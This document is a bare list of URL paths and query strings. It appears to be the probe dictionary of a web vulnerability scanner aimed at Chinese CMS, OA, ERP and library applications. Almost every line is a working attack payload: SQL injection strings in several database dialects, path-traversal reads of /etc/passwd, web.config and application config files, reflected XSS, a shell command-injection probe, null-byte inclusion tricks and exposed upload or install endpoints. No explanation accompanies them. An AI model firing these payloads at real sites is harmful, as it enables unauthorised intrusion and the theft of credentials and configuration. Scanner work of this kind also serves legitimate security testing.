/ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml
/news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
/jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
/scrp/book.cfm?sKeyword=1&sFieldName=bname
/main/
/asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
/getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
/install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
/module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
/myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
/Logon?action=logon
/UserSecurityController.do?method=getPassword&step=2&userName=admin
/webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
/common/down.jsp?filepath=%5Ccommon%5Cdown.jsp&filename=webscan.txt
/OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
/showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
/general/crm/apps/crm/include/import/export.php
/Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
/Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
/admin/others.asp?mudi=download_EN_CN&ENname=../config.asp&CNname=config.asp
/cms/conf/system.xml
/erp/reportmanage/taskreport/lljinduadd.aspx
/oa/erp/SalePlan/YearPlanAdd.aspx
/oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
/oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
/oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
/downTemp.aspx?type=downDb&fileName=../web.config
/showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
/showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
/cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
/datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
/user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
/admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
/admin/manage.jsp
/shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
/content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
/mod/shop/quest/ajax.php?op=auction_buy
/wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
/news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
/mod/payment/quest.php?op=check&page=b2b
/mod/ntga/jwsview.php
/uploadd.php
/jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
/admin/backup.aspx
/mod/mad/video_upload.php
/business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
/SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
/Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
/frontProduct/search.ac
/Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
/Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
/FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
/website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
/website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
/bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
/znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
/opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/cms/framework/dbfile/createdbfile.jsp
/CN/item/downloadFile.jsp?filedisplay=../../web-inf/web.xml
/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
/FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
/interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
/inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
/general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
/general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
/backup/backup/backup.asp
/module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
/admini/item/iteminfo.aspx
/admini/newstopic/newstopicinfo.aspx
/download?fileName=/WEB-INF/web.xml
/RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
/index_lnlqcj.php
/main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
/scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
/information/OA_InforList.asp
/information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
/information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null
/public/jsp/multiuploadfile.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&photos=null
/public/jsp/smartUploadPic.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jspx,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
/jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
/jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
/caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
/MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
/mailClassInfor.asp
/MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
/Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
/jcms/m_1_9/user/down.jsp?pathfile=../jcms/m_1_9/user/down.jsp
/tophp.asp
/Manage/CalendarMemo/event.ashx
/RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
/SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
/SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
/workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
/SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
/SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
/oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
/lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
/kaoqin/JiaoYanDis.asp
/admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
/tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
/filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
/Manage/CalendarMemo/load.ashx
/php/report/include/ldap.inc
/php/report/include/util.inc
/php/report/include/config.inc
/php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/user/storage_explore.php
/grad/admin/domain_logo.php
/user/storage_fold_explore.php
/php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
/user/send_queue/upload_addition.php
/php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
/grad/admin/admin_logo_upload.php
/common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
/download.ashx?files=../web.config
/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
/?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
/jis/manage/databak/showlog.jsp?path=../showlog.jsp
/download.jsp?path=UserFiles/../download.jsp
/tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
/zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
/jis/interface/offer.jsp?flag=user
/jis/down.jsp?pathfile=./down.jsp%00.jpg
/MockLogin.aspx
/mobile/user.php?act=order_list
/seeyon/management/status.jsp
/api/download.ashx?fid=nUDWEgdorSH4j/+9GiQTlA==
/monitoring?part=web.xml
/?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
/download.action?fullPath=./WEB-INF/web.xml
/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
/jis/update/update.jsp?fn_billstatus=U
/install/install.php
/public/minify.php?f=../ooxxooxxo/hehe.js
/admin/index.asp
/plus/outside.php?id=../template/default/style/yun_index.css%00
/productpic.aspx?id=100611)%20and%201=char(106)%20--
/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
/jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
/jcms/m_5_5/m_5_5_3/import.jsp
/upload!uploadImg.action
/AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
/?do=index&mod=goods
/index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
/cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
/webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
/MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
/RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
/Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
/news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
/client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
/siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
/admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
/admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
/admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
/webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
/plugins/phpdisk_client/client_sub.php?action=upload_file
/ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
/SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
/company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
/Web/Login.aspx
/Web/KeySearch.aspx?searchid=1234
/portal/admin/setright.aspx?id=-1
/infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
/prog/filedown.php?pe_id=MQ==
/emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
/emlib4/format/release/aspx/eml_userwh.aspx
/voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
/kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
/getTopLinksPortalCategoriesAction.action?siteId=../../../../../../../../../../windows/win.ini%00.jpg
/letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
/cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
/web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
/Tools/stream/FlvStream.ashx?file=./Index.aspx
/tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
/webConfigSet/configSetting.aspx?url=/login/index.aspx
